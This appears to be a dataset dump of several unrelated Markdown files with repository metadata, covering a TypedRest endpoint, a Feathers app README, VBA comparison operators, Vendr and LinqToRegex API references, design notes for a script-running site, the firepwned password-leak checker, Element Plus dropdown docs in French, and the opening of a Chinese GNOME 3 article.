] | 2 | 2020-05-07T22:47:19.000Z | 2020-08-10T11:31:56.000Z | docs/endpoints/entry.md | TypedRest/docs | eb2bc76afa0a8f30631027d60647ae2d1e265a98 | [
"MIT"
] | null | null | null | # Entry endpoint
Represent the top-level URI of an API. Used to address the various resources of the API.
The constructor of the entry endpoint requires you to specify the APIs root URL. It also provides optional parameters to override the default HTTP client, JSON serializer, [error handler](../error-handling/index.md) and [link handler](../link-handling/index.md).
| 61.833333 | 262 | 0.781671 | eng_Latn | 0.975292 |
edfc6eb777401c34cf63cb3f5ede93e0c827b19e | 1,247 | md | Markdown | README.md | jermsam/sample-s | 0717d17b1e69534b231cb20f6291fd14cb6ffc2b | [
"MIT"
] | 1 | 2020-03-11T18:41:08.000Z | 2020-03-11T18:41:08.000Z | README.md | jermsam/sample-s | 0717d17b1e69534b231cb20f6291fd14cb6ffc2b | [
"MIT"
] | 3 | 2020-07-17T11:47:06.000Z | 2021-09-01T13:17:21.000Z | README.md | jermsam/sample-s | 0717d17b1e69534b231cb20f6291fd14cb6ffc2b | [
"MIT"
] | null | null | null | # sample-s
> a rest/socket-io api for a sample social media
## About
This project uses [Feathers](http://feathersjs.com). An open source web framework for building modern real-time applications.
Stores user data; credentials, posts, comments and replies in a postgres database. Used by [sample-u](https://github.com/jermsam/sample-u) frontend web app
The main 3rd party libraries are:
1. [s3-blob-store](https://github.com/jb55/s3-blob-store) for AWS-S3 Media Storage
2. [sequelize] (https://github.com/sequelize/sequelize) for Relation Database Mapping with postgres
## To Run it
Getting up and running is as easy as 1, 2, 3.
1. Clone the repository.
2. Install your dependencies
```
cd path/to/sample-s; yarn
```
3. Set up a postgres database and aws-s3 store bucket and then write a .env file that defines the following constants:
```
DB_URL = # the database url for your postgres database
SECRET = # any random string for your jwt authentic secret
AWSBucket = # your aws-s3 bucket name
AWSAccessKeyId = # your aws-s3 access key id
AWSSecretKey = # your aws-s3 secret key
```
4. Start your app
```
yarn start
```
## Testing
Simply run `yarn test` and all your tests in the `test/` directory will be run.
| 28.340909 | 155 | 0.72494 | eng_Latn | 0.957923 |
edfca36d3edbd37657fb5378f9e025b09af2ef5a | 6,272 | md | Markdown | Language/Reference/User-Interface-Help/comparison-operators.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | Language/Reference/User-Interface-Help/comparison-operators.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-09-28T07:52:15.000Z | 2021-09-28T07:52:15.000Z | Language/Reference/User-Interface-Help/comparison-operators.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-09-28T07:45:29.000Z | 2021-09-28T07:45:29.000Z | ---
title: Comparison operators
keywords: vblr6.chm1008875
f1_keywords:
- vblr6.chm1008875
ms.prod: office
ms.assetid: 9c254e88-5641-ea7d-b99a-cb614c3095a7
ms.date: 11/19/2018
localization_priority: Priority
---
# Comparison operators
Used to compare [expressions](../../Glossary/vbe-glossary.md#expression).
## Syntax
_result_ = _expression1_ _comparisonoperator_ _expression2_ <br/>
_result_ = _object1_ **Is** _object2_ <br/>
_result_ = _string_ **Like** _pattern_
[Comparison operators](../../Glossary/vbe-glossary.md#comparison-operator) have these parts:
|Part|Description|
|:-----|:-----|
| _result_|Required; any numeric [variable](../../Glossary/vbe-glossary.md#variable).|
| _expression_|Required; any expression.|
| _comparisonoperator_|Required; any comparison operator.|
| _object_|Required; any object name.|
| _string_|Required; any [string expression](../../Glossary/vbe-glossary.md#string-expression).|
| _pattern_|Required; any string expression or range of characters.|
## Remarks
The following table contains a list of the comparison operators and the conditions that determine whether _result_ is **True**, **False**, or [Null](../../Glossary/vbe-glossary.md#null).
|Operator|True if|False if|Null if|
|:-----|:-----|:-----|:-----|
|`<` (Less than)| _expression1_ < _expression2_| _expression1_ >= _expression2_| _expression1_ or _expression2_ = **Null**|
|`< =` (Less than or equal to)| _expression1_ <= _expression2_| _expression1_ > _expression2_| _expression1_ or _expression2_ = **Null**|
|`>` (Greater than)| _expression1_ > _expression2_| _expression1_ <= _expression2_| _expression1_ or _expression2_ = **Null**|
|`> =` (Greater than or equal to)| _expression1_ >= _expression2_| _expression1_ < _expression2_| _expression1_ or _expression2_ = **Null**|
|`=` (Equal to)| _expression1_ = _expression2_| _expression1_ <> _expression2_| _expression1_ or _expression2_ = **Null**|
|`<>` (Not equal to)| _expression1_ <> _expression2_| _expression1_ = _expression2_| _expression1_ or _expression2_ = **Null**|
> [!NOTE]
> The **Is** and **Like** operators have specific comparison functionality that differs from the operators in the table.
When comparing two expressions, you may not be able to easily determine whether the expressions are being compared as numbers or as strings. The following table shows how the expressions are compared or the result when either expression is not a [Variant](../../Glossary/vbe-glossary.md#variant-data-type).
|If|Then|
|:-----|:-----|
|Both expressions are [numeric data types](../../Glossary/vbe-glossary.md#numeric-data-type) ([Byte](../../Glossary/vbe-glossary.md#byte-data-type), [Boolean](../../Glossary/vbe-glossary.md#boolean-data-type), [Integer](../../Glossary/vbe-glossary.md#integer-data-type), [Long](../../Glossary/vbe-glossary.md#long-data-type), [Single](../../Glossary/vbe-glossary.md#single-data-type), [Double](../../Glossary/vbe-glossary.md#double-data-type), [Date](../../Glossary/vbe-glossary.md#date-data-type), [Currency](../../Glossary/vbe-glossary.md#currency-data-type), or [Decimal](../../Glossary/vbe-glossary.md#decimal-data-type))|Perform a numeric comparison.|
|Both expressions are [String](../../Glossary/vbe-glossary.md#string-data-type)|Perform a [string comparison](../../Glossary/vbe-glossary.md#string-comparison).|
|One expression is a numeric data type and the other is a **Variant** that is, or can be, a number|Perform a numeric comparison.|
|One expression is a numeric data type and the other is a string **Variant** that can't be converted to a number|A `Type Mismatch` error occurs.|
|One expression is a **String** and the other is any **Variant** except a **Null**|Perform a string comparison.|
|One expression is [Empty](../../Glossary/vbe-glossary.md#empty) and the other is a numeric data type|Perform a numeric comparison, using 0 as the **Empty** expression.|
|One expression is **Empty** and the other is a **String**|Perform a string comparison, using a zero-length string ("") as the **Empty** expression.|
<br/>
If _expression1_ and _expression2_ are both **Variant** expressions, their underlying type determines how they are compared. The following table shows how the expressions are compared or the result from the comparison, depending on the underlying type of the **Variant**.
|If|Then|
|:-----|:-----|
|Both **Variant** expressions are numeric|Perform a numeric comparison.|
|Both **Variant** expressions are strings|Perform a string comparison.|
|One **Variant** expression is numeric and the other is a string|The numeric expression is less than the string expression.|
|One **Variant** expression is **Empty** and the other is numeric|Perform a numeric comparison, using 0 as the **Empty** expression.|
|One **Variant** expression is **Empty** and the other is a string|Perform a string comparison, using a zero-length string ("") as the **Empty** expression.|
|Both **Variant** expressions are **Empty**|The expressions are equal.|
When a **Single** is compared to a **Double**, the **Double** is rounded to the precision of the **Single**.
If a **Currency** is compared with a **Single** or **Double**, the **Single** or **Double** is converted to a **Currency**.
Similarly, when a **Decimal** is compared with a **Single** or **Double**, the **Single** or **Double** is converted to a **Decimal**. For **Currency**, any fractional value less than .0001 may be lost; for **Decimal**, any fractional value less than 1E-28 may be lost, or an overflow error can occur. Such fractional value loss may cause two values to compare as equal when they are not.
## Example
This example shows various uses of comparison operators, which you use to compare expressions.
```vb
Dim MyResult, Var1, Var2
MyResult = (45 < 35) ' Returns False.
MyResult = (45 = 45) ' Returns True.
MyResult = (4 <> 3) ' Returns True.
MyResult = ("5" > "4") ' Returns True.
Var1 = "5": Var2 = 4 ' Initialize variables.
MyResult = (Var1 > Var2) ' Returns True.
Var1 = 5: Var2 = Empty
MyResult = (Var1 > Var2) ' Returns True.
Var1 = 0: Var2 = Empty
MyResult = (Var1 = Var2) ' Returns True.
```
## See also
- [Operator summary](operator-summary.md)
[!include[Support and feedback](~/includes/feedback-boilerplate.md)] | 58.074074 | 656 | 0.720504 | eng_Latn | 0.958172 |
edfccf87c75bc11a99b0ecca874fb8f3075049d1 | 428 | md | Markdown | content/core/2.1.0/umbraco-v9/reference/vendr-core/vendr-core-discounts-rules/ihaschilddiscountrules.md | JamieTownsend84/vendr-documentation | a8295778c4f3a55f976d77ca3f9aa0087572568e | [
"MIT"
] | 6 | 2020-05-27T19:01:56.000Z | 2021-06-11T09:43:59.000Z | content/core/2.1.0/umbraco-v9/reference/vendr-core/vendr-core-discounts-rules/ihaschilddiscountrules.md | JamieTownsend84/vendr-documentation | a8295778c4f3a55f976d77ca3f9aa0087572568e | [
"MIT"
] | 41 | 2020-03-31T11:16:35.000Z | 2022-03-11T10:18:41.000Z | content/core/2.1.0/umbraco-v9/reference/vendr-core/vendr-core-discounts-rules/ihaschilddiscountrules.md | JamieTownsend84/vendr-documentation | a8295778c4f3a55f976d77ca3f9aa0087572568e | [
"MIT"
] | 25 | 2020-03-02T17:26:16.000Z | 2022-02-28T10:47:54.000Z | ---
title: IHasChildDiscountRules
description: API reference for IHasChildDiscountRules in Vendr, the eCommerce solution for Umbraco
---
## IHasChildDiscountRules
```csharp
public interface IHasChildDiscountRules
```
**Namespace**
* [Vendr.Core.Discounts.Rules](../)
### Properties
#### Rules
```csharp
public IList<IDiscountRuleProvider> Rules { get; }
```
<!-- DO NOT EDIT: generated by xmldocmd for Vendr.Core.dll -->
| 17.833333 | 98 | 0.731308 | yue_Hant | 0.358542 |
edfd05b4866744dd189ad342065d3f26353b156b | 1,599 | md | Markdown | docs/api/Pihrtsoft/Text/RegularExpressions/Linq/Pattern/op_Explicit/README.md | timiil/LinqToRegex | 6213e778681bfc20225b19de7ca3200dc9a4f12f | [
"Apache-2.0"
] | 156 | 2015-08-12T17:57:07.000Z | 2022-01-30T03:14:29.000Z | docs/api/Pihrtsoft/Text/RegularExpressions/Linq/Pattern/op_Explicit/README.md | timiil/LinqToRegex | 6213e778681bfc20225b19de7ca3200dc9a4f12f | [
"Apache-2.0"
] | 3 | 2016-04-26T09:08:02.000Z | 2017-11-02T16:10:42.000Z | docs/api/Pihrtsoft/Text/RegularExpressions/Linq/Pattern/op_Explicit/README.md | timiil/LinqToRegex | 6213e778681bfc20225b19de7ca3200dc9a4f12f | [
"Apache-2.0"
] | 18 | 2015-08-13T19:34:34.000Z | 2021-12-04T15:38:35.000Z | # Pattern\.Explicit Operator
[Home](../../../../../../README.md)
**Containing Type**: [Pattern](../README.md)
**Assembly**: Pihrtsoft\.Text\.RegularExpressions\.Linq\.dll
## Overloads
| Operator | Summary |
| -------- | ------- |
| [Explicit(Char to Pattern)](#Pihrtsoft_Text_RegularExpressions_Linq_Pattern_op_Explicit_System_Char__Pihrtsoft_Text_RegularExpressions_Linq_Pattern) | Converts specified character to a pattern\. |
| [Explicit(String to Pattern)](#Pihrtsoft_Text_RegularExpressions_Linq_Pattern_op_Explicit_System_String__Pihrtsoft_Text_RegularExpressions_Linq_Pattern) | Converts specified text to a pattern\. |
## Explicit\(Char to Pattern\) <a id="Pihrtsoft_Text_RegularExpressions_Linq_Pattern_op_Explicit_System_Char__Pihrtsoft_Text_RegularExpressions_Linq_Pattern"></a>
\
Converts specified character to a pattern\.
```csharp
public static explicit operator Pihrtsoft.Text.RegularExpressions.Linq.Pattern(char value)
```
### Parameters
**value**   [Char](https://docs.microsoft.com/en-us/dotnet/api/system.char)
The Unicode character to convert\.
### Returns
[Pattern](../README.md)
## Explicit\(String to Pattern\) <a id="Pihrtsoft_Text_RegularExpressions_Linq_Pattern_op_Explicit_System_String__Pihrtsoft_Text_RegularExpressions_Linq_Pattern"></a>
\
Converts specified text to a pattern\.
```csharp
public static explicit operator Pihrtsoft.Text.RegularExpressions.Linq.Pattern(string text)
```
### Parameters
**text**   [String](https://docs.microsoft.com/en-us/dotnet/api/system.string)
A text to convert\.
### Returns
[Pattern](../README.md)
| 29.611111 | 198 | 0.771732 | yue_Hant | 0.416736 |
edfde757cb61bc5bcf3e42722135bd06d80336df | 284 | md | Markdown | docs/readme.md | xXluki98Xx/youtube-dl-server | 65b1e5a1e98000eb09440443b3a17f261ca3e138 | [
"MIT"
] | 1 | 2020-07-28T15:58:02.000Z | 2020-07-28T15:58:02.000Z | docs/readme.md | xXluki98Xx/youtube-dl-server | 65b1e5a1e98000eb09440443b3a17f261ca3e138 | [
"MIT"
] | null | null | null | docs/readme.md | xXluki98Xx/youtube-dl-server | 65b1e5a1e98000eb09440443b3a17f261ca3e138 | [
"MIT"
] | null | null | null | please install the python moduls and linux packages using
pip3 install -r requirements.txt --upgrade
cat requirements-apt.txt | xargs sudo apt install -y
and then ignore every change to the env file, if you want to upload something to github
git update-index --assume-unchanged
| 31.555556 | 87 | 0.785211 | eng_Latn | 0.974519 |
edfeccb057b3131be62f047317a22d72bccf231c | 1,291 | md | Markdown | NOTES.md | jan25/skripts | aae0197acdf1c073a5761e14298c02d6c299024a | [
"MIT"
] | null | null | null | NOTES.md | jan25/skripts | aae0197acdf1c073a5761e14298c02d6c299024a | [
"MIT"
] | 1 | 2021-06-05T08:36:27.000Z | 2021-06-05T08:36:27.000Z | NOTES.md | jan25/skripts | aae0197acdf1c073a5761e14298c02d6c299024a | [
"MIT"
] | 1 | 2020-07-09T17:26:32.000Z | 2020-07-09T17:26:32.000Z | ## Features
- Editor to write JS code
- Execute button to run code
- Save button to save new changes in code
- Output panel to display output or errors
- Generate Unique URL for a script using backend store
- File based datastore
- Persistant/distributed database (nice to have)
- Add dependencies(npm/node) (nice to have)
## Design
- Vue.js frontend with a single page
- Logo
- Center aligned editor
- Execute and Save button below editor
- Output panel below editor, editor buttons
- Node backend to serve frontend static files, save and execute endpoints
- `GET /[<UID>]` endpoint to serve home page
- `POST /exec` endpoint to send code, execute on server and return results(or errors)
- `POST /save` endpoint to save code
- File based backend store to create unique URL per script
-
- Redirect to `/<UID>` on `/exec` and `/save` for a new script
- 6 char randomly generated alpha-numeric IDs
- Caveat: Coupled to a single server instance
### ABANDONED
- Node runtime on server - will use node backend calls
- Single/shared runtime per server instance
- `/node-runtime` has the node project including `package.json` and `node_modules`
- `/scripts` folder inside node project to keep track of saved scripts
- E.g. `/node-runtime/scripts/xdh452.js`
| 35.861111 | 87 | 0.730442 | eng_Latn | 0.967113 |
edff8f8f1d72c3f0ecdf1a06b5e0de7bc457cb23 | 3,589 | md | Markdown | data/readme_files/christophetd.firepwned.md | DLR-SC/repository-synergy | 115e48c37e659b144b2c3b89695483fd1d6dc788 | [
"MIT"
] | 5 | 2021-05-09T12:51:32.000Z | 2021-11-04T11:02:54.000Z | data/readme_files/christophetd.firepwned.md | DLR-SC/repository-synergy | 115e48c37e659b144b2c3b89695483fd1d6dc788 | [
"MIT"
] | null | null | null | data/readme_files/christophetd.firepwned.md | DLR-SC/repository-synergy | 115e48c37e659b144b2c3b89695483fd1d6dc788 | [
"MIT"
] | 3 | 2021-05-12T12:14:05.000Z | 2021-10-06T05:19:54.000Z | # firepwned
[](https://travis-ci.org/christophetd/firepwned)
Firepwned is a tool that checks if your Firefox saved passwords have been involved in a known data leak using the [Have I Been Pwned API](https://haveibeenpwned.com/Passwords).
<p align="center">
<img src="./screenshot.png" />
</p>
Features:
- **Does not send any of your password or password hash to any third-party service, including Have I Been Pwned** (see [How It Works](#how-it-works) below).
- Supports Firefox profiles encrypted with a master password.
- Uses multiple threads for efficiency.
## Installation
```
$ git clone https://github.com/christophetd/firepwned.git
$ cd firepwned
$ pip install -r requirements.txt
```
On Debian / Ubuntu you'll need the package `libnss3`, which you should already have if you have Firefox installed.
On Mac OS X, you'll need to install NSS: `brew install nss`/ `port install nss`.
## Usage
```
$ python firepwned.py
```
- To specify a path to a Firefox profile directory, use the `--profile` option (by default: the first file found matching `~/.mozilla/firefox/*.default` on Ubuntu or `~/Library/Application\ Support/Firefox/Profiles/*.default` on Mac OS
- To adjust the number of threads used to make requests to the Have I Been Pwned API, use the `--threads` option (by default: 10)
## Docker image
[](https://microbadger.com/images/christophetd/firepwned)
You can also use the `christophetd/firepwned` image. It is based on Alpine and is very lightweight (~20 MB). However, keep in mind that using a Docker image you didn't build yourself is generally not a good practice: I *could* very well have built it myself with a different source code than the one in this repository in order to steal your passwords (spoiler: that's not the case). If you wish to build the image yourself, run `docker build . -t firepwned` and use `firepwned` instead of `christophetd/firepwned` in the instructions below.
When running the container, you need to mount the directory of your Firefox profile to `/profile` in the container.
```
$ docker run --rm -it \
--volume $(ls -d ~/.mozilla/firefox/*.default):/profile \
christophetd/firepwned
```
Any additional argument you add to the command will be passed to the script, e.g.
```
$ docker run --rm -it \
--volume $(ls -d ~/.mozilla/firefox/*.default):/profile \
christophetd/firepwned \
--threads 20
```
## How it works
The Have I Been Pwned API supports checking if a password has been leaked without providing the password itself, or even a hash. The way it works is you provide the API with the first 5 characters of the SHA1 hash of the password to check. The API then returns the list of all leaked hashes starting with this prefix, and the script can check locally if one of the hashes matches the password. More information: https://www.troyhunt.com/ive-just-launched-pwned-passwords-version-2/
## Compatibility
Python 3 only. Should theoretically work on any OS supporting Python if provided with the directory of a valid Firefox profile, e.g. on Windows 7:
```
> python firepwned.py --profile "C:\Users\Christophe\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxx.default"
```
## Acknowledgments
The code to read the saved passwords from Firefox is taken from [firefox_decrypt](https://github.com/unode/firefox_decrypt), written by Renato Alves and under the GPL-3.0 license.
## Unit tests
```
$ python -m unittest discover test
```
| 43.768293 | 541 | 0.747283 | eng_Latn | 0.988949 |
edffac1b7aea3aadea7ac1e7352a1b8aec35800d | 11,768 | md | Markdown | website/docs/fr-FR/dropdown.md | pumelotea/element-plus | 1ab50ded03bbf46fb36a6495b207c6785019e753 | [
"MIT"
] | 1 | 2020-12-04T07:06:20.000Z | 2020-12-04T07:06:20.000Z | website/docs/fr-FR/dropdown.md | pumelotea/element-plus | 1ab50ded03bbf46fb36a6495b207c6785019e753 | [
"MIT"
] | 57 | 2020-09-02T01:24:02.000Z | 2021-04-30T03:34:46.000Z | website/docs/fr-FR/dropdown.md | pumelotea/element-plus | 1ab50ded03bbf46fb36a6495b207c6785019e753 | [
"MIT"
] | 1 | 2022-03-09T14:57:00.000Z | 2022-03-09T14:57:00.000Z | ## Dropdown
Menu déroulant pour afficher des listes de liens et d'actions possibles.
### Usage
Passez sur le menu avec la souris pour dérouler son contenu.
:::demo L'élément déclencheur est généré par le `slot` par défaut, et le menu déroulant est généré par le `slot` appelé `dropdown`. Par défaut le menu apparaît simplement en passant la souris sur l'élément déclencheur, sans avoir à cliquer.
```html
<el-dropdown>
<span class="el-dropdown-link">
Menu déroulant<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item disabled>Action 4</el-dropdown-item>
<el-dropdown-item divided>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<style>
.el-dropdown-link {
cursor: pointer;
color: #409EFF;
}
.el-icon-arrow-down {
font-size: 12px;
}
</style>
```
:::
### Élément déclencheur
Utilisez le bouton pour ouvrir le menu déroulant.
:::demo Utilisez `split-button` pour séparer le déclencheur du reste du bouton, ce dernier devenant la partie gauche et le déclencheur la partie droite.
```html
<el-dropdown>
<el-button type="primary">
Liste déroulante<i class="el-icon-arrow-down el-icon--right"></i>
</el-button>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
<el-dropdown-item>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<el-dropdown split-button type="primary" @click="handleClick">
Liste déroulante
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
<el-dropdown-item>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<style>
.el-dropdown {
vertical-align: top;
}
.el-dropdown + .el-dropdown {
margin-left: 15px;
}
.el-icon-arrow-down {
font-size: 12px;
}
</style>
<script>
export default {
methods: {
handleClick() {
alert('button click');
}
}
}
</script>
```
:::
### Déclencheur
Vous pouvez choisir de déclencher le menu au moment du clic, ou en passant la souris sur l'élément.
:::demo Utilisez l'attribut `trigger`. Par défaut, il est à `hover`.
```html
<el-row class="block-col-2">
<el-col :span="8">
<span class="demonstration">En passant la souris</span>
<el-dropdown>
<span class="el-dropdown-link">
Liste déroulante<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item icon="el-icon-plus">Action 1</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus">Action 2</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus-outline">Action 3</el-dropdown-item>
<el-dropdown-item icon="el-icon-check">Action 4</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-check">Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
</el-col>
<el-col :span="8">
<span class="demonstration">En cliquant</span>
<el-dropdown trigger="click">
<span class="el-dropdown-link">
Liste déroulante<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item icon="el-icon-plus">Action 1</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus">Action 2</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus-outline">Action 3</el-dropdown-item>
<el-dropdown-item icon="el-icon-check">Action 4</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-check">Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
</el-col>
<el-col :span="8">
<span class="demonstration">Par clic droit</span>
<el-dropdown trigger="contextmenu">
<span class="el-dropdown-link">
Liste déroulante<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item icon="el-icon-plus">Action 1</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus">Action 2</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-plus-outline">Action 3</el-dropdown-item>
<el-dropdown-item icon="el-icon-check">Action 4</el-dropdown-item>
<el-dropdown-item icon="el-icon-circle-check">Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
</el-col>
</el-row>
<style>
.el-dropdown-link {
cursor: pointer;
color: #409EFF;
}
.el-icon-arrow-down {
font-size: 12px;
}
.demonstration {
display: block;
color: #8492a6;
font-size: 14px;
margin-bottom: 20px;
}
</style>
```
:::
### Fermer le menu
Utilisez l'attribut `hide-on-click` pour déterminer si le menu se ferme après avoir cliqué sur un élément de la liste.
:::demo Par défaut le menu se ferme après avoir cliqué dans la liste. Vous pouvez changer cette option en mettant `hide-on-click` à `false`.
```html
<el-dropdown :hide-on-click="false">
<span class="el-dropdown-link">
Liste déroulante<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item disabled>Action 4</el-dropdown-item>
<el-dropdown-item divided>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<style>
.el-dropdown-link {
cursor: pointer;
color: #409EFF;
}
.el-icon-arrow-down {
font-size: 12px;
}
</style>
```
:::
### Évènement command
Cliquer sur un élément du dropdown déclenche un évènement "command".
Le paramètre de cet évènement peut être assigné à chaque élément de la liste.
:::demo
```html
<el-dropdown @command="handleCommand">
<span class="el-dropdown-link">
Liste déroulante<i class="el-icon-arrow-down el-icon--right"></i>
</span>
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item command="a">Action 1</el-dropdown-item>
<el-dropdown-item command="b">Action 2</el-dropdown-item>
<el-dropdown-item command="c">Action 3</el-dropdown-item>
<el-dropdown-item command="d" disabled>Action 4</el-dropdown-item>
<el-dropdown-item command="e" divided>Action 5</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<style>
.el-dropdown-link {
cursor: pointer;
color: #409EFF;
}
.el-icon-arrow-down {
font-size: 12px;
}
</style>
<script>
export default {
methods: {
handleCommand(command) {
this.$message('click on item ' + command);
}
}
}
</script>
```
:::
### Tailles
En plus de la taille par défaut, le composant Dropdown propose trois autres tailles différentes.
:::demo Utilisez `size` pour déterminer une autre taille parmi `medium`, `small` ou `mini`.
```html
<el-dropdown split-button type="primary">
Défaut
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<el-dropdown size="medium" split-button type="primary">
Medium
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<el-dropdown size="small" split-button type="primary">
Small
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
<el-dropdown size="mini" split-button type="primary">
Mini
<template #dropdown>
<el-dropdown-menu>
<el-dropdown-item>Action 1</el-dropdown-item>
<el-dropdown-item>Action 2</el-dropdown-item>
<el-dropdown-item>Action 3</el-dropdown-item>
<el-dropdown-item>Action 4</el-dropdown-item>
</el-dropdown-menu>
</template>
</el-dropdown>
```
:::
### Attributs du Dropdown
| Attribut | Description | Type | Valeurs acceptées | Défaut |
|------------- |---------------- |---------------- |---------------------- |-------- |
| type | Type du bouton, se référer au composant `Button`. Ne marche que si `split-button` est `true`. | string | — | — |
| size | Taille du menu, marche aussi avec `split button`. | string | medium / small / mini | — |
| max-height | the max height of menu | string / number | — | — |
| split-button | Si le bouton est séparé en deux. | boolean | — | false |
| placement | Emplacement du menu déroulant | string | top/top-start/top-end/bottom/bottom-start/bottom-end | bottom-end |
| trigger | Comment déclencher l'ouverture du menu. | string | hover/click/contextmenu | hover |
| hide-on-click | Si le menu doit disparaître après avoir cliqué sur un élément. | boolean | — | true |
| show-timeout | Délai avant d'afficher le menu (ne marche que si `trigger` est `hover`) | number | — | 250 |
| hide-timeout | Délai avant de cacher le menu (ne marche que si `trigger` est `hover`) | number | — | 150 |
| tabindex | [tabindex](https://developer.mozilla.org/fr/docs/Web/HTML/Attributs_universels/tabindex) de Dropdown | number | — | 0 |
### Dropdown Slots
| Nom | Description |
|------|--------|
| — | Contenu du Dropdown. Note: doit être un élément du DOM valide (ex. `<span>, <button> etc.`) ou `el-component`, pour y attacher un évènement. |
| dropdown | Contenu du menu du Dropdown, en général un élément `<el-dropdown-menu>`. |
### Évènements du Dropdown
| Nom | Description | Paramètres |
|---------- |-------- |---------- |
| click | Si `split-button` est `true`, se déclenche quand le bouton de gauche est cliqué. | — |
| command | Se déclenche quand un élément de la liste est cliqué. | L'attribut command de l'élément de la liste. |
| visible-change | Se déclenche quand le menu s'affiche ou disparaît. | `true` quand il apparaît, `false` sinon. |
### Attributs des éléments du menu
| Attribut | Description | Type | Valeurs acceptées | Défaut |
|------------- |---------------- |---------------- |---------------------- |-------- |
| command | Le contenu à envoyer au callback de l'évènement `command` du Dropdown. | string/number/object | — | — |
| disabled | Si l'élément est désactivé. | boolean | — | false |
| divided | Si un diviseur doit être affiché. | boolean | — | false |
| icon | Classe de l'icône. | string | — | — |
| 33.913545 | 240 | 0.631373 | fra_Latn | 0.444384 |
edffe7c30cc18c40ea0edfd34dabbe5fa068259c | 3,196 | md | Markdown | published/201409/20140731 Easy Steps to Make GNOME 3 More Efficient.md | QiaoN/TranslateProject | 191253c815756f842a783dd6f24d4dc082c225eb | [
"Apache-2.0"
] | 1,994 | 2015-01-04T11:40:04.000Z | 2022-03-29T17:18:18.000Z | published/201409/20140731 Easy Steps to Make GNOME 3 More Efficient.md | QiaoN/TranslateProject | 191253c815756f842a783dd6f24d4dc082c225eb | [
"Apache-2.0"
] | 1,257 | 2015-01-03T12:52:51.000Z | 2022-03-31T12:52:12.000Z | published/201409/20140731 Easy Steps to Make GNOME 3 More Efficient.md | CN-QUAN/TranslateProject | 89f982acd224c24de4431ce147aa1dedaa70b206 | [
"Apache-2.0"
] | 2,359 | 2015-01-04T02:09:02.000Z | 2022-03-31T05:31:18.000Z | 轻而易举提升GNOME 3效率
================================================================================
极少Linux桌面像GNOME 3一样饱受争议。自发布以来,它被奚落,被挖苦,还被痛恨。事情是,它实际上是一个很不错的桌面。它牢固、可靠、稳定、优雅、简洁……而且带有一些小的调整和附加的东西,它可以做成市面上最高效、最友好的桌面之一。
当然,什么才是高效而又/或者是用户友好的桌面呢?那取决于观念——每个人都有的东西。归根到底,我的目标是帮助你快速访问你要用到的应用和文件。简单吧。不管你信不信,将GNOME 3一步一步变成更为高效而又用户友好的世界是一项十分容易的任务——你只需要知道哪里去查看以及做些什么即可。在这里,我会引领你去往正确的方向。
我决定从这里开始着手这个事情,首先安装一个干净的[Ubuntu GNOME][1]发行版开始,该安装包含有一个GNOME 3.12桌面。在以GNOME为中心的桌面准备好后,就该开始对它进行微调了。
